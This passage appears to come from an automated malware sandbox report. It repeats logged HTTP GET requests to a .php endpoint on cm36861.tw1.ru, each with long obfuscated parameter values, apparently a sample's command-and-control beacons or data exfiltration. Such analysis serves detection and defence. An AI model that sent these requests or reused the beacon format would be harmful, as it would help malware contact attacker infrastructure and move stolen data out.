ajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN